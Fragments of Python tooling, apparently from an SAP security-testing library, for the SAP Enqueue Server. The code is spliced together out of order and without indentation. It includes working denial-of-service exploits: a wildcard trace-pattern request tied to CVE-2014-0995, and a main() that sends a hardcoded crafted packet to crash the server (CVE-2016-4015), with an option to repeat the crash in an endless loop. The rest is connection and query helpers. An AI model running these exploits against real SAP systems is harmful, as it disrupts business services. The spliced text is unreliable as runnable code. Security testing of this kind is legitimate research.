def do_check_pattern_loop_dos(self, args):
"""Tests if the server is vulnerable to an endless loop when a trace
pattern with a wildcard is set (CVE-2014-0995)."""
if not self.connected:
self._error("You need to connect to the server first !")
return
# Send Set trace patterns Info
patterns = [SAPEnqueueTracePattern(pattern="*", len=1)]
p = SAPEnqueue(dest=3, adm_opcode=6, adm_trace_level=3,
adm_trace_action=4, adm_trace_logging=1,
adm_trace_nopatterns=1,
adm_trace_nopatterns1=1,
adm_trace_patterns=patterns)
self._debug("Sending trace pattern with wildcards")
self.connection.send(p)
self._debug("Trace pattern set")
p = SAPEnqueue(dest=3, adm_opcode=1)
try:
self.connection.sr(p)[SAPEnqueue]
self._print("Server available, probably not vulnerable to CVE-2014-0995")
except:
self._print("Server unavailable, probably vulnerable to CVE-2014-0995.")
def main():
options = parse_options()
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
print("[*] Testing Enqueue Server CVE-2016-4015 DoS vulnerability on host %s:%d" % (options.remote_host,
options.remote_port))
# Crafting the item
payload = Raw("\x06\x01\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00"
"\x00\x00\x00\x03Vahagn-pc_5276_0\x00\x00\x00\x00\x02\x00\x00\x00;\x00\x00\x00\x05\x00\x00\x00\x03"
"\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x01")
item = SAPEnqueue(len_frag=89, id=0, more_frags=129, type=187, dest=243, len=89, opcode=160)/payload
try:
if options.loop:
try:
while True:
send_crash(options.remote_host, options.remote_port, item, options.verbose, options.route_string)
sleep(options.delay)
except KeyboardInterrupt:
print("[*] Cancelled by the user")
else:
for i in range(options.number):
send_crash(options.remote_host, options.remote_port, item, options.verbose, options.route_string)
sleep(options.delay)
except SocketError:
print("[*] Connection error, take a look at the enqueue server process !")
def do_connect(self, args):
"""Initiate the connection to the Enqueue Server."""
# Create the socket connection
try:
self.connection = SAPEnqueueStreamSocket.get_nisocket(
self.options.remote_host, self.options.remote_port,
self.options.route_string)
except SocketError as e:
self._error("Error connecting with the Enqueue Server")
self._error(str(e))
return
self._print("Attached to %s / %d" %
(self.options.remote_host, self.options.remote_port))
params = [
SAPEnqueueParam(param=0,
value=int(
self.runtimeoptions["client_recv_length"])),
SAPEnqueueParam(param=1,
value=int(
self.runtimeoptions["client_send_length"])),
SAPEnqueueParam(param=3,
set_name=self.runtimeoptions["client_name"]),
SAPEnqueueParam(param=2, value=59),
SAPEnqueueParam(param=5,
value=int(self.runtimeoptions["client_version"])),
SAPEnqueueParam(param=6, value=1, len=4)
]
# Send Parameter Request packet
p = SAPEnqueue(dest=6, opcode=1, params=params)
self._debug("Retrieving parameters")
response = self.connection.sr(p)[SAPEnqueue]
# Walk over the server's parameters
for param in response.params:
self._debug(
"Server parameter: %s=%s" %
(enqueue_param_values[param.param],
param.value if param.param not in [0x03] else param.set_name))
# Save server version and name as runtime options
if param.param == 0x03:
self.runtimeoptions["server_name"] = param.set_name
if param.param == 0x05:
self.runtimeoptions["server_version"] = param.value
self._print("Server name: %s" % self.runtimeoptions["server_name"])
self._print("Server version: %d" %
self.runtimeoptions["server_version"])
self.connected = True
def do_get_replication_info(self, args):
"""Get information about the status and statistics of the replication."""
if not self.connected:
self._error("You need to connect to the server first !")
return
# Send Get Replication Info
p = SAPEnqueue(dest=3, adm_opcode=4)
self._debug("Sending get replication info request")
response = self.connection.sr(p)[SAPEnqueue]
response.show()
self._debug("Obtained replication info")
def do_dummy_request(self, args):
"""Send a dummy request to the server to check if it is alive. """
if not self.connected:
self._error("You need to connect to the server first !")
return
# Send Dummy Request
p = SAPEnqueue(dest=3, adm_opcode=1)
self._debug("Sending dummy request")
response = self.connection.sr(p)[SAPEnqueue]
response.show()
self._debug("Performed dummy request")
